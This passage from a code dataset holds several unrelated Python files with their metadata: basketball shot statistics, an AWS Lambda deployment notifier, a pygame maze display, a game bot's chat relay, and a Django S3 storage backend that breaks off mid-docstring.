\"TEAM_ID\": item[\"TEAM_ID\"],\n \"TEAM_NAME\": item[\"TEAM_NAME\"],\n \"TEAM_ABBREVIATION\": item[\"TEAM_ABBREVIATION\"],\n \"FGM\": 0,\n \"FGA\": 0,\n \"FG2M\": 0,\n \"FG2A\": 0,\n \"FG3M\": 0,\n \"FG3A\": 0,\n \"OVERALL_FGA\": 0,\n \"OVERALL_FG2A\": 0,\n \"OVERALL_FG3A\": 0,\n }\n totals_dict[entity_id] = add_to_tracking_shot_totals(\n totals_dict[entity_id], item\n )\n\n return list(totals_dict.values())\n\n\ndef add_to_tracking_shot_totals(totals, item):\n \"\"\"\n Adds shot totals from item to totals and updates percentages\n\n :param dict totals: Totals to be added to\n :param dict item: Item to be added to totals dict\n :return: totals dict\n :rtype: dict\n \"\"\"\n totals[\"FGM\"] += item[\"FGM\"]\n totals[\"FGA\"] += item[\"FGA\"]\n totals[\"FG2M\"] += item[\"FG2M\"]\n totals[\"FG2A\"] += item[\"FG2A\"]\n totals[\"FG3M\"] += item[\"FG3M\"]\n totals[\"FG3A\"] += item[\"FG3A\"]\n totals[\"OVERALL_FGA\"] += item.get(\"OVERALL_FGA\", 0)\n totals[\"OVERALL_FG2A\"] += item.get(\"OVERALL_FG2A\", 0)\n totals[\"OVERALL_FG3A\"] += item.get(\"OVERALL_FG3A\", 0)\n fg2a = totals[\"FG2A\"]\n fg2m = totals[\"FG2M\"]\n fg3a = totals[\"FG3A\"]\n fg3m = totals[\"FG3M\"]\n totals[\"FG2_PCT\"] = fg2m / fg2a if fg2a != 0 else 0\n totals[\"FG3_PCT\"] = fg3m / fg3a if fg3a != 0 else 0\n totals[\"EFG_PCT\"] = (1.5 * fg3m + fg2m) / (fg3a + fg2a) if (fg3a + fg2a) != 0 else 0\n totals[\"FGA_FREQUENCY\"] = (\n totals[\"FGA\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FG2A_FREQUENCY\"] = (\n totals[\"FG2A\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FG3A_FREQUENCY\"] = (\n totals[\"FG3A\"] / totals[\"OVERALL_FGA\"] if totals[\"OVERALL_FGA\"] != 0 else 0\n )\n totals[\"FREQUENCY_OF_FG2A\"] = (\n totals[\"FG2A\"] / totals[\"OVERALL_FG2A\"] if totals[\"OVERALL_FG2A\"] != 0 else 0\n )\n totals[\"FREQUENCY_OF_FG3A\"] = (\n totals[\"FG3A\"] / totals[\"OVERALL_FG3A\"] if totals[\"OVERALL_FG3A\"] != 0 else 0\n )\n\n return totals\n","sub_path":"nba_stats_tracking/tracking_shots.py","file_name":"tracking_shots.py","file_ext":"py","file_size_in_byte":18697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632060812","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nChecks the DynamoDB deployments table for deployments with a createdAt date\nolder than the given AGE_BOUNDARY_MINS.\n\nPublishes a message to a given SNS topic if any out of date deployments are\nfound.\n\nThis lambda is intended to be run on a repeated schedule of some period less\nthan AGE_BOUNDARY_MINS.\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport os\n\nimport boto3\n\nfrom wellcome_lambda_utils.deployment_utils import get_deployments_from_dynamo\nfrom wellcome_aws_utils.lambda_utils import log_on_error\nfrom wellcome_aws_utils.sns_utils import publish_sns_message\n\n\ndef _old_deployment(age_boundary_mins, deployment):\n age_boundary = (\n datetime.now() - timedelta(minutes=age_boundary_mins)\n )\n\n return (\n (deployment.created_at < age_boundary) and deployment.color == \"green\"\n )\n\n\ndef filter_old_deployments(deployments, age_boundary_mins):\n return (\n [d for d in deployments if _old_deployment(age_boundary_mins, d)]\n )\n\n\n@log_on_error\ndef main(event, _):\n table_name = os.environ[\"TABLE_NAME\"]\n topic_arn = os.environ[\"TOPIC_ARN\"]\n age_boundary_mins = int(os.environ[\"AGE_BOUNDARY_MINS\"])\n\n sns_client = boto3.client('sns')\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(table_name)\n\n deployments = get_deployments_from_dynamo(table)\n old_deployments = filter_old_deployments(deployments, age_boundary_mins)\n\n if deployments:\n publish_sns_message(\n sns_client=sns_client,\n topic_arn=topic_arn,\n message=deployments\n )\n\n print(f'old_deployments = {old_deployments!r}')\n","sub_path":"monitoring/deployment_tracking/notify_old_deploys/src/notify_old_deploys.py","file_name":"notify_old_deploys.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249011186","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/11/5 上午8:37\n# @Author : ytq\n# @FileName: url_reader.py\n# @Software: PyCharm\nimport os\n\nfrom src.wework_request.utils.read_yaml import ReadYaml\n\n\nclass UrlReader:\n\n def __init__(self):\n self.path = \"../config\"\n self.file = \"urls\"\n self.ym_obj = ReadYaml(path=self.path,file=self.file)\n\n def get_url(self,obj_name):\n url_obj = self.ym_obj.get_yaml_data(obj_name)\n return url_obj[\"url\"]\n\n def get_api(self,obj_name,url_name):\n url_obj = self.ym_obj.get_yaml_data(obj_name)\n return url_obj[url_name]\n\n def get_api_by_parent(self,url_name,per_obj):\n return per_obj[url_name]\n\nif __name__ == '__main__':\n ur = UrlReader()\n print(ur.get_url(\"wework\"))\n print(ur.get_api(\"wework\",\"token\"))\n dpt = ur.get_api(\"wework\",\"department\")\n print(ur.get_api_by_parent(\"dpt_list\",dpt))","sub_path":"src/wework_request/data/url_reader.py","file_name":"url_reader.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"156239344","text":"# 20190320\n# 사용자로부터 명령어를 받아서 터틀을 제어해보자.\n# 즉 사용자가 \"left\"를 입력하면 왼쪽으로 60도 만큼 회전하고 50 steps 만큼 전진하고\n# 사용자가 \"right\"를 입력하면 오른쪽으로 60도 만큼 회전하고 50 steos 만큼 전진하는 프로그램을 만들어 보자.\n\nimport turtle\n\nt = turtle.Pen()\n\nwhile True:\n input_string = input(\"Please choose the direction[left / right]: \")\n if input_string == \"left\":\n t.right(60)\n t.forward(50)\n\n elif input_string == \"right\":\n t.left(60)\n t.forward(50)\n\n elif input_string == \"stop\":\n print(\"End\")\n break\n else:\n print(\"Retype\\n\")\n","sub_path":"20190320 Practice/lab03.py","file_name":"lab03.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440796213","text":"#!/usr/bin/python3\n# coding: utf-8\n\nimport pygame\nfrom pygame.locals import *\n\nfrom character import Character\nfrom items import Items\nfrom level import Level\nfrom inputs import inputs\n\n#from maze import screen_loop\n\n\nclass GraphicLevel(Level):\n \"\"\" Class redefines the display() method based on the inheritance of the Level class \"\"\"\n\n def __init__(self, file):\n super().__init__(file)\n #self.items = {}\n\n def display(self):\n \"\"\" Method specifically redefined to display the maze graphically \"\"\"\n\n \"\"\" Initializing and loading pictures \"\"\"\n fenetre = pygame.display.get_surface()\n picture_background = pygame.image.load(\n \"images/background.jpg\").convert()\n fenetre.blit(picture_background, (0, 0))\n \"\"\" Loading sprites \"\"\"\n pic_mac_gyver = pygame.image.load(\n \"images/mac_gyver.png\").convert_alpha()\n pic_gardian = pygame.image.load(\"images/gardian.png\").convert_alpha()\n pic_wall = pygame.image.load(\"images/wall.png\").convert()\n pic_ether = pygame.image.load(\"images/ether.png\").convert()\n pic_tube = pygame.image.load(\"images/tube.png\").convert()\n pic_niddle = pygame.image.load(\"images/niddle.png\").convert_alpha()\n pic_syringe = pygame.image.load(\"images/syringe.png\").convert()\n pic_free = pygame.image.load(\"images/free.png\").convert_alpha()\n pic_defeat = pygame.image.load(\"images/defeat.png\").convert_alpha()\n mask_wall = pygame.image.load(\"images/mask_wall.jpg\").convert()\n # Makes transparent the color white (RGB value: 255,255,255) of the picture\n pic_tube.set_colorkey((255, 255, 255))\n pic_syringe.set_colorkey((255, 255, 255))\n pic_ether.set_colorkey((1, 1, 1))\n\n\n for index_line in range(15):\n # Inversion of x and y in graphical representation\n y = index_line * 40\n for index_col in range(15):\n x = index_col * 40\n if (index_line, index_col) in self.passages:\n if (index_line, index_col) \\\n == self.mac_gyver.get_position():\n fenetre.blit(pic_mac_gyver, (x, y))\n # elif (index_line, index_col) in self.tools.location_tools:\n # fenetre.blit(pic_ether, (x, y))\n #self.items[x, y] = pic_generic_tool\n elif (index_line, index_col) == self.tools.location_ether:\n fenetre.blit(pic_ether, (x, y)) # Display of the ether\n elif (index_line, index_col) == self.tools.location_tube:\n fenetre.blit(pic_tube, (x, y)) # Display of the tube\n elif (index_line, index_col) == self.tools.location_niddle:\n fenetre.blit(pic_niddle, (x, y)) # Display of the niddle\n elif (index_line, index_col) == self.pos_exit:\n fenetre.blit(pic_gardian, (x, y)) # Display of the guardian\n else:\n fenetre.blit(pic_wall, (x, y))\n\n # management of the pouch\n fenetre.blit(mask_wall, (600, 0))\n if len(self.tools.pouch) < 3:\n if \"E\" in list(self.tools.pouch):\n fenetre.blit(pic_ether, (610, 50))\n if \"T\" in list(self.tools.pouch):\n fenetre.blit(pic_tube, (610, 100))\n if \"N\" in list(self.tools.pouch):\n fenetre.blit(pic_niddle, (610, 150))\n elif len(self.tools.pouch) == 3:\n fenetre.blit(mask_wall, (600, 0))\n fenetre.blit(pic_syringe, (600, 80))\n\n\n # if self.mac_gyver.fight == \"win\":\n # fenetre.blit(pic_free, (0, 0)) # you win\n # #pygame.time.Clock().tick(300)\n # while stay:\n # if inputs() == \"end\":\n # stay = False\n # #screen_loop(\"images/free.png\")\n\n # elif self.mac_gyver.fight == \"defeat\":\n # fenetre.blit(pic_defeat, (0, 0)) # you loose\n # #pygame.time.Clock().tick(300)\n # while stay:\n # if inputs() == \"end\":\n # stay = False\n","sub_path":"graphic_level.py","file_name":"graphic_level.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466967456","text":"from core.chat_blob import ChatBlob\nfrom core.command_service import CommandService\nfrom core.decorators import instance, event\nfrom core.dict_object import DictObject\nfrom core.logger import Logger\nfrom core.public_channel_service import PublicChannelService\nfrom core.setting_service import SettingService\nfrom core.setting_types import BooleanSettingType\nfrom core.text import Text\nfrom modules.core.org_members.org_member_controller import OrgMemberController\n\n\n@instance()\nclass OrgChannelController:\n MESSAGE_SOURCE = \"org_channel\"\n ORG_CHANNEL_PREFIX = \"[Org]\"\n\n def __init__(self):\n self.logger = Logger(__name__)\n\n def inject(self, registry):\n self.bot = registry.get_instance(\"bot\")\n self.character_service = registry.get_instance(\"character_service\")\n self.message_hub_service = registry.get_instance(\"message_hub_service\")\n self.setting_service: SettingService = registry.get_instance(\"setting_service\")\n self.ban_service = registry.get_instance(\"ban_service\")\n self.log_controller = registry.get_instance(\"log_controller\", is_optional=True)\n self.online_controller = registry.get_instance(\"online_controller\", is_optional=True)\n self.text: Text = registry.get_instance(\"text\")\n\n def pre_start(self):\n self.message_hub_service.register_message_source(self.MESSAGE_SOURCE)\n\n def start(self):\n self.message_hub_service.register_message_destination(\n self.MESSAGE_SOURCE, self.handle_incoming_relay_message,\n [\"private_channel\", \"discord\", \"websocket_relay\", \"tell_relay\", \"broadcast\", \"raffle\", \"cloak_reminder\", \"wave_counter\", \"shutdown_notice\", \"raid\", \"tower_attacks\"],\n [self.MESSAGE_SOURCE])\n\n self.setting_service.register(self.module_name, \"prefix_org_priv\", True, BooleanSettingType(), \"Should the prefix [org] be displayed in relayed messages\")\n\n def handle_incoming_relay_message(self, ctx):\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(ctx.formatted_message, conn=conn)\n\n @event(event_type=PublicChannelService.ORG_CHANNEL_MESSAGE_EVENT, description=\"Relay messages from the org channel to the relay hub\", is_hidden=True)\n def handle_org_message_event(self, event_type, event_data):\n if self.bot.get_conn_by_char_id(event_data.char_id) or self.ban_service.get_ban(event_data.char_id):\n return\n\n if event_data.extended_message:\n message = event_data.extended_message.get_message()\n else:\n message = event_data.message\n\n if event_data.char_id == 4294967295 or event_data.char_id == 0:\n sender = None\n formatted_message = \"{org} {msg}\".format(org=self.ORG_CHANNEL_PREFIX,\n msg=message)\n else:\n sender = DictObject({\"char_id\": event_data.char_id, \"name\": event_data.name})\n formatted_message = \"{org} {char}: {msg}\".format(org=self.ORG_CHANNEL_PREFIX,\n char=self.text.make_charlink(event_data.name),\n msg=message)\n\n self.bot.send_message_to_other_org_channels(formatted_message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, message)\n\n @event(event_type=OrgMemberController.ORG_MEMBER_LOGON_EVENT, description=\"Notify when org member logs on\")\n def org_member_logon_event(self, event_type, event_data):\n if self.bot.is_ready():\n if self.online_controller:\n char_info = self.online_controller.get_char_info_display(event_data.char_id, event_data.conn)\n else:\n char_info = self.character_service.resolve_char_to_name(event_data.char_id, f\"Unknown({event_data.char_id})\")\n\n msg = f\"{char_info} has logged on.\"\n if self.log_controller:\n msg += \" \" + self.log_controller.get_logon(event_data.char_id)\n\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(msg, conn=conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, None, self.ORG_CHANNEL_PREFIX, msg)\n\n @event(event_type=OrgMemberController.ORG_MEMBER_LOGOFF_EVENT, description=\"Notify when org member logs off\")\n def org_member_logoff_event(self, event_type, event_data):\n if self.bot.is_ready():\n char_name = event_data.name or f\"Unknown({event_data.char_id})\"\n msg = f\"{char_name} has logged off.\"\n if self.log_controller:\n msg += \" \" + self.log_controller.get_logoff(event_data.char_id)\n\n for _id, conn in self.bot.get_conns(lambda x: x.is_main and x.org_id):\n self.bot.send_org_message(msg, conn=conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, None, self.ORG_CHANNEL_PREFIX, msg)\n\n @event(event_type=PublicChannelService.ORG_CHANNEL_COMMAND_EVENT, description=\"Relay commands from the org channel to the relay hub\", is_hidden=True)\n def outgoing_org_message_event(self, event_type, event_data):\n msg = self.ORG_CHANNEL_PREFIX + \" \"\n sender = None\n if event_data.name:\n msg += self.text.make_charlink(event_data.name) + \": \"\n sender = DictObject({\"char_id\": event_data.char_id, \"name\": event_data.name})\n\n if isinstance(event_data.message, ChatBlob):\n pages = self.text.paginate(ChatBlob(event_data.message.title, event_data.message.msg),\n event_data.conn,\n self.setting_service.get(\"org_channel_max_page_length\").get_value())\n if len(pages) < 4:\n for page in pages:\n message = msg + page\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, page)\n else:\n message = msg + event_data.message.title\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, event_data.message.title)\n else:\n message = msg + event_data.message\n self.bot.send_message_to_other_org_channels(message, from_conn=event_data.conn)\n self.message_hub_service.send_message(self.MESSAGE_SOURCE, sender, self.ORG_CHANNEL_PREFIX, event_data.message)\n","sub_path":"modules/standard/org/org_channel_controller.py","file_name":"org_channel_controller.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333300319","text":"import os\nimport math\nimport mimetypes\n\ntry:\n from io import StringIO, BytesIO\nexcept ImportError:\n from io import StringIO, BytesIO # noqa\n\nfrom django.conf import settings\nfrom django.core.files.base import File\nfrom .storage import Storage, FileSystemStorage\nfrom .tasks import upload_task\n\nfrom django.core.exceptions import ImproperlyConfigured, SuspiciousOperation\nfrom django.utils.encoding import force_text as force_unicode, smart_str\nfrom django.utils.deconstruct import deconstructible\n\nfrom .filechunkio import FileChunkIO\n\ntry:\n from boto.s3.connection import S3Connection, SubdomainCallingFormat,NoHostProvided\n from boto.exception import S3ResponseError\n from boto.s3.key import Key\nexcept ImportError:\n raise ImproperlyConfigured(\"Could not load Boto's S3 bindings.\\n\"\n \"See https://github.com/boto/boto\")\n\nACCESS_KEY_NAME = getattr(settings, 'AWS_S3_ACCESS_KEY_ID', getattr(settings, 'AWS_ACCESS_KEY_ID', None))\nSECRET_KEY_NAME = getattr(settings, 'AWS_S3_SECRET_ACCESS_KEY', getattr(settings, 'AWS_SECRET_ACCESS_KEY', None))\nHOST = getattr(settings, 'AWS_HOST', NoHostProvided)\nHEADERS = getattr(settings, 'AWS_HEADERS', {})\nSTORAGE_BUCKET_NAME = getattr(settings, 'AWS_STORAGE_BUCKET_NAME', None)\nAUTO_CREATE_BUCKET = getattr(settings, 'AWS_AUTO_CREATE_BUCKET', False)\nDEFAULT_ACL = getattr(settings, 'AWS_DEFAULT_ACL', 'public-read')\nBUCKET_ACL = getattr(settings, 'AWS_BUCKET_ACL', DEFAULT_ACL)\nQUERYSTRING_AUTH = getattr(settings, 'AWS_QUERYSTRING_AUTH', True)\nQUERYSTRING_EXPIRE = getattr(settings, 'AWS_QUERYSTRING_EXPIRE', 3600)\nREDUCED_REDUNDANCY = getattr(settings, 'AWS_REDUCED_REDUNDANCY', False)\nLOCATION = getattr(settings, 'AWS_LOCATION', '')\nENCRYPTION = getattr(settings, 'AWS_S3_ENCRYPTION', False)\nCUSTOM_DOMAIN = getattr(settings, 'AWS_S3_CUSTOM_DOMAIN', None)\nCALLING_FORMAT = getattr(settings, 'AWS_S3_CALLING_FORMAT',\n SubdomainCallingFormat())\nSECURE_URLS = getattr(settings, 'AWS_S3_SECURE_URLS', True)\nFILE_NAME_CHARSET = getattr(settings, 'AWS_S3_FILE_NAME_CHARSET', 'utf-8')\nFILE_OVERWRITE = getattr(settings, 'AWS_S3_FILE_OVERWRITE', True)\nFILE_BUFFER_SIZE = getattr(settings, 'AWS_S3_FILE_BUFFER_SIZE', 62914560)\nCHUNK_SIZE = getattr(settings, 'AWS_S3_CHUNK_SIZE', 6291456)\nIS_GZIPPED = getattr(settings, 'AWS_IS_GZIPPED', False)\nPRELOAD_METADATA = getattr(settings, 'AWS_PRELOAD_METADATA', False)\nGZIP_CONTENT_TYPES = getattr(settings, 'GZIP_CONTENT_TYPES', (\n 'text/css',\n 'application/javascript',\n 'application/x-javascript',\n))\nURL_PROTOCOL = getattr(settings, 'AWS_S3_URL_PROTOCOL', 'http:')\n\n# Backward-compatibility: given the anteriority of the SECURE_URL setting\n# we fall back to https if specified in order to avoid the construction\n# of unsecure urls.\nif SECURE_URLS:\n URL_PROTOCOL = 'https:'\n\nif IS_GZIPPED:\n from gzip import GzipFile\n\n\ndef safe_join(base, *paths):\n \"\"\"\n A version of django.utils._os.safe_join for S3 paths.\n\n Joins one or more path components to the base path component\n intelligently. Returns a normalized version of the final path.\n\n The final path must be located inside of the base path component\n (otherwise a ValueError is raised).\n\n Paths outside the base path indicate a possible security\n sensitive operation.\n \"\"\"\n from urllib.parse import urljoin\n\n # smart_text(s, encoding='utf-8', strings_only=False, errors='strict') converts\n # its input to a Unicode string\n\n # force_text(s, encoding='utf-8', strings_only=False, errors='strict') is\n # identical to smart_text() in almost all cases. The difference is when the\n # first argument is a lazy translation instance.\n # While smart_text() preserves lazy translations, force_text() forces\n # those objects to a Unicode string (causing the translation to occur).\n base_path = force_unicode(base)\n base_path = base_path.rstrip('/')\n paths = [force_unicode(p) for p in paths]\n\n final_path = base_path\n for path in paths:\n final_path = urljoin(final_path.rstrip('/') + \"/\", path.rstrip(\"/\"))\n\n # Ensure final_path starts with base_path and that the next character after\n # the final path is '/' (or nothing, in which case final_path must be\n # equal to base_path).\n base_path_len = len(base_path)\n if (not final_path.startswith(base_path) or\n final_path[base_path_len:base_path_len + 1] not in ('', '/')):\n raise ValueError('the joined path is located outside of the base path'\n ' component')\n\n return final_path.lstrip('/')\n\n\n@deconstructible\nclass S3BotoStorage(Storage):\n \"\"\"\n Amazon Simple Storage Service using Boto\n\n This storage backend supports opening files in read or write\n mode and supports streaming(buffering) data in chunks to S3\n when writing.\n \"\"\"\n connection_class = S3Connection\n connection_response_error = S3ResponseError\n\n def __init__(self, bucket=STORAGE_BUCKET_NAME, access_key=None,\n secret_key=None, bucket_acl=BUCKET_ACL, acl=DEFAULT_ACL,\n headers=HEADERS, gzip=IS_GZIPPED,\n gzip_content_types=GZIP_CONTENT_TYPES,\n querystring_auth=QUERYSTRING_AUTH,\n querystring_expire=QUERYSTRING_EXPIRE,\n reduced_redundancy=REDUCED_REDUNDANCY,\n encryption=ENCRYPTION,\n custom_domain=CUSTOM_DOMAIN,\n secure_urls=SECURE_URLS,\n url_protocol=URL_PROTOCOL,\n location=LOCATION,\n file_buffer_size=FILE_BUFFER_SIZE,\n chunk_size=CHUNK_SIZE,\n file_name_charset=FILE_NAME_CHARSET,\n preload_metadata=PRELOAD_METADATA,\n calling_format=CALLING_FORMAT):\n\n self.bucket_acl = bucket_acl\n self.bucket_name = bucket\n self.acl = acl\n self.headers = headers\n self.preload_metadata = preload_metadata\n self.gzip = gzip\n self.gzip_content_types = gzip_content_types\n self.querystring_auth = querystring_auth\n self.querystring_expire = querystring_expire\n self.reduced_redundancy = reduced_redundancy\n self.encryption = encryption\n self.custom_domain = custom_domain\n self.secure_urls = secure_urls\n self.url_protocol = url_protocol\n self.location = location or ''\n self.location = self.location.lstrip('/')\n self.chunk_size = chunk_size\n self.file_buffer_size = file_buffer_size\n self.file_name_charset = file_name_charset\n self.calling_format = calling_format\n self._entries = {}\n if not access_key and not secret_key:\n access_key, secret_key = self._get_access_keys()\n self.connection = self.connection_class(access_key, secret_key,\n calling_format=self.calling_format,host=HOST)\n\n @property\n def bucket(self):\n \"\"\"\n Get the current bucket. If there is no current bucket object\n create it.\n \"\"\"\n if not hasattr(self, '_bucket'):\n self._bucket = self._get_or_create_bucket(self.bucket_name)\n return self._bucket\n\n @property\n def entries(self):\n \"\"\"\n Get the locally cached files for the bucket.\n \"\"\"\n if self.preload_metadata and not self._entries:\n self._entries = dict((self._decode_name(entry.key), entry)\n for entry in self.bucket.list())\n return self._entries\n\n def _get_access_keys(self):\n \"\"\"\n Gets the access keys to use when accessing S3. If none\n are provided to the class in the constructor or in the\n settings then get them from the environment variables.\n \"\"\"\n access_key = ACCESS_KEY_NAME\n secret_key = SECRET_KEY_NAME\n if (access_key or secret_key) and (not access_key or not secret_key):\n # TODO: this seems to be broken\n access_key = os.environ.get(ACCESS_KEY_NAME)\n secret_key = os.environ.get(SECRET_KEY_NAME)\n\n if access_key and secret_key:\n # Both were provided, so use them\n return access_key, secret_key\n\n return None, None\n\n def _get_or_create_bucket(self, name):\n \"\"\"Retrieves a bucket if it exists, otherwise creates it.\"\"\"\n try:\n #If validate=False is passed, no request is made to the service\n # (no charge/communication delay). This is only safe to do if you are\n # sure the bucket exists.\n # If the bucket does not exist, an S3ResponseError will be raised.\n return self.connection.get_bucket(name, validate=AUTO_CREATE_BUCKET)\n\n except self.connection_response_error:\n if AUTO_CREATE_BUCKET:\n bucket = self.connection.create_bucket(name)\n bucket.set_acl(self.bucket_acl)\n return bucket\n\n raise ImproperlyConfigured(\"Bucket specified by \"\n \"AWS_STORAGE_BUCKET_NAME does not exist. \"\n \"Buckets can be automatically created by setting \"\n \"AWS_AUTO_CREATE_BUCKET=True\")\n\n #Anytime we're taking in a name we call\n # _clean_name: normpath and replace\n # _normalize_name: check the path integrity rel 'location'\n def _clean_name(self, name):\n \"\"\"\n Cleans the name so that Windows style paths work\n i.e. normpath escapes back slashes '\\' to '\\\\'\n we then replace with single\n \"\"\"\n # Useful for windows' paths\n return os.path.normpath(name).replace('\\\\', '/')\n\n def _normalize_name(self, name):\n \"\"\"\n Normalizes the name so that paths like /path/to/ignored/../something.txt\n work. We check to make sure that the path pointed to is not outside\n the directory specified by the LOCATION setting.\n Required since the S3 key, will in essence, will be the path name\n \"\"\"\n try:\n return safe_join(self.location, name)\n except ValueError:\n raise SuspiciousOperation(\"Attempted access to '{}' denied.\".format(name))\n\n def _encode_name(self, name):\n \"\"\"\n file_name_charset = 'AWS_S3_FILE_NAME_CHARSET', 'utf-8'\n smart_str - returns a str or a lazy string\n \"\"\"\n return smart_str(name, encoding=self.file_name_charset)\n\n def _decode_name(self, name):\n return force_unicode(name, encoding=self.file_name_charset)\n\n def _compress_content(self, content):\n \"\"\"Gzip a given string content.\"\"\"\n zbuf = StringIO()\n zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf)\n try:\n zfile.write(content.read())\n finally:\n zfile.close()\n content.file = zbuf\n content.seek(0)\n return content\n\n def _open(self, name, mode='rb'):\n \"\"\"\n Called by Storage.open(), this is the actual mechanism the storage class uses\n to open the file. This must return a File object, though in most cases, you’ll\n want to return some subclass (S3BotoStorageFile) here that implements logic\n specific to the backend storage system.\n \"\"\"\n name = self._normalize_name(self._clean_name(name))\n\n f = S3BotoStorageFile(name, mode, self)\n if not f.key:\n raise IOError('File does not exist: %s' % name)\n return f\n\n def _save(self, name, content):\n \"\"\"\n Called by Storage.save(). The name will already have gone through\n get_valid_name() and get_available_name(), and the content will be a\n File object itself.\n Should return the actual name of name of the file saved (usually the name\n passed in, but if the storage needs to change the file name return the\n new name instead).\n \"\"\"\n\n #Convert windows-style file names\n cleaned_name = self._clean_name(name)\n\n #1. removes any relative path naming conventions\n #2. calls _safe_join on the name\n name = self._normalize_name(cleaned_name)\n\n # \"shallow copying\" -- copy and create new references\n # \"deep copying\" -- copy by value\n headers = self.headers.copy()\n\n #Default is 'applications/octet-stream'\n content_type = getattr(content, 'content_type', mimetypes.guess_type(name)[0] or Key.DefaultContentType)\n\n # setting the content_type in the key object is not enough.\n self.headers.update({'Content-Type': content_type})\n\n # gzip == IS_GZIPPED (false by default)\n if self.gzip and content_type in self.gzip_content_types:\n content = self._compress_content(content)\n headers.update({'Content-Encoding': 'gzip'})\n\n ## content.name = name of the file including the relative path from MEDIA_ROOT\n content.name = cleaned_name\n encoded_name = self._encode_name(name)\n ### cleaned_name = '/YYYY/MM/DD/.ext'\n ### encoded_name : //YYYY/MM/DD/.ext\n\n ##Save sync\n fs = FileSystemStorage()\n fs.save(cleaned_name, content)\n\n task = upload_task.apply_async(\n args=[\n self.bucket_name,\n encoded_name,\n cleaned_name,\n self.chunk_size,\n self.file_buffer_size,\n content_type,\n self.reduced_redundancy,\n self.encryption,\n self.headers,\n self.acl\n ]\n # Hack - right now this is called for any save (brand, audio, ...)\n #link=handle_post_upload.s()\n )\n #print(get_upload_task_status(task.id))\n\n return cleaned_name\n\n def delete(self, name):\n name = self._normalize_name(self._clean_name(name))\n self.bucket.delete_key(self._encode_name(name))\n\n def exists(self, name):\n name = self._normalize_name(self._clean_name(name))\n if self.entries:\n return name in self.entries\n k = self.bucket.new_key(self._encode_name(name))\n return k.exists()\n\n def listdir(self, name):\n name = self._normalize_name(self._clean_name(name))\n # for the bucket.list and logic below name needs to end in /\n # But for the root path \"\" we leave it as an empty string\n if name:\n name += '/'\n\n dirlist = self.bucket.list(self._encode_name(name))\n files = []\n dirs = set()\n base_parts = name.split(\"/\")[:-1]\n for item in dirlist:\n parts = item.name.split(\"/\")\n parts = parts[len(base_parts):]\n if len(parts) == 1:\n # File\n files.append(parts[0])\n elif len(parts) > 1:\n # Directory\n dirs.add(parts[0])\n return list(dirs), files\n\n def size(self, name):\n name = self._normalize_name(self._clean_name(name))\n\n # Accessing this property caches file by taking self.bucket.list()\n # and putting them in dict self._entries\n # Off by default\n if self.entries:\n entry = self.entries.get(name)\n if entry:\n return entry.size\n return 0\n # key.size – The size, in bytes, of the object.\n return self.bucket.get_key(self._encode_name(name)).size\n\n def modified_time(self, name):\n try:\n from dateutil import parser, tz\n except ImportError:\n raise NotImplementedError()\n name = self._normalize_name(self._clean_name(name))\n entry = self.entries.get(name)\n # only call self.bucket.get_key() if the key is not found\n # in the preloaded metadata.\n if entry is None:\n entry = self.bucket.get_key(self._encode_name(name))\n # convert to string to date\n last_modified_date = parser.parse(entry.last_modified)\n # if the date has no timzone, assume UTC\n if last_modified_date.tzinfo == None:\n last_modified_date = last_modified_date.replace(tzinfo=tz.tzutc())\n # convert date to local time w/o timezone\n timezone = tz.gettz(settings.TIME_ZONE)\n timezone.normalize(last_modified_date)\n return last_modified_date.astimezone(timezone).replace(tzinfo=None)\n\n def url(self, name):\n # _normalize calls safe_join that adds the 'location' tag\n # specified in our .config module\n cleaned_name = self._normalize_name(self._clean_name(name))\n\n fs = FileSystemStorage()\n local_exists = fs.exists(name)\n if local_exists:\n return os.path.join('/', cleaned_name)\n\n if self.custom_domain:\n return \"%s//%s/%s\" % (self.url_protocol, self.custom_domain, cleaned_name)\n\n return self.connection.generate_url(self.querystring_expire,\n method='GET', bucket=self.bucket.name, key=self._encode_name(cleaned_name),\n query_auth=self.querystring_auth, force_http=not self.secure_urls)\n\n def get_available_name(self, name):\n \"\"\" Overwrite existing file with the same name. \"\"\"\n if FILE_OVERWRITE:\n name = self._clean_name(name)\n return name\n return super(S3BotoStorage, self).get_available_name(name)\n\n\nclass S3BotoStorageFile(File):\n \"\"\"\n The default file object used by the S3BotoStorage backend.\n\n This file implements file streaming using boto's multipart\n uploading functionality. The file can be opened in read or\n write mode.\n\n This class extends Django's File class. However, the contained\n data is only the data contained in the current buffer. So you\n should not access the contained file object directly. You should\n access the data via this class.\n\n Warning: This file *must* be closed using the close() method 